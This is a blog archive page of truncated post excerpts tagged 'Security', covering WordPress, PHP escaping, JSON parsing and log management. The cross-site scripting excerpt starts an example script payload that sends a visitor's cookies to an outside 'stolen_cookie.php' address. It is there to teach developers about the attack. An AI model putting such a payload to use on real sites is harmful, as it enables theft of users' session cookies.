Archive

- Posts Tagged ‘Security’

Solution to WordPress Blank Web Pages without error Display

Are you getting blank pages on WordPress without any error displaying on web browser? I got this error when I have deactivated the W3 Total Cache and with that removed subdomain used as cdn. Therefore, I have shifted all the media files to normal upload directly. In the process I… (Continue)

Few Security Plugins for WordPress

Very less number of posts has been written for wordpress security. I was looking for making my wordpress installation more secure and found very little for WordPress security compared to other stuff on net. I have tried "AskApache Password Protect" few days back, but it failed for some reason. I… (Continue)

JavaScript Encode-Decode URL

Why url encoding needed? All NON-ASCII characters need to be converted to %xx value for a url. Spaces and special characters can break the url. Something like "encoding_test.php?q=hello world" need to converted into "firstpage.php?q=hello%20world". Most modern browser do this job most of the time. So, we do not face much… (Continue)

Log Management of Various Logs generated

Management of Logs generated by various applications - Servers, Firewall and many others network application are important for large organizations. For becoming PCI complaints, it is one of the essential requirements. PCI DSS (Payment Card Industry Data Security Standards), a standards from the PCI security council, requires all log to… (Continue)

Parse JSON using JSON Parser or eval()!

JSON is in use for data interchange format. It is accepted in many programming language whether client side or server side language. So, learning JSON and using it securely is needed. Both JavaScript and PHP has in-built functions for this. JSON parser function is useful if your JSON text is… (Continue)

PHP Security: Remove Default Escaping In PHP

Reading this post first may be helpful! Remove default PHP escaping and apply your own at runtime. This way you are safe at client's setting of magic quote in their php.ini. PHP has default escaping functionality. It escapes all incoming data. It is preferred not to use default magic quote… (Continue)

PHP Security: Cross-Site scripting

Cross-Site scripting is one of the best know attack. Any web application that displays input is at risk. In this Web 2.0 time this attack can be easy to do. Suppose a user has entered this data in input in form: Hi, I am cool. <script> document.location = 'http://coolsite.com/stolen_cookie.php?cookies=' +… (Continue)

Essential PHP Security – Chris Shiflett, O’Reilly Publication

"Essential PHP Security" is an essential book for experienced PHP programmer. It discusses essential security measures you can take for making your PHP applications secure. Even if there are another team for your high profile web site's security then also it is very useful. You will learn about many php.ini… (Continue)

Web 2.0 Security Issues

Web 2.0 is enriching browsing experience and providing many kind packages in the form of Blog, Social networking sites and other content sharing sites. With lots of facility provided in Web 2.0 sites, there are lots of securities issues as well. Check this good discussion on web 2.0 security issues.… (Continue)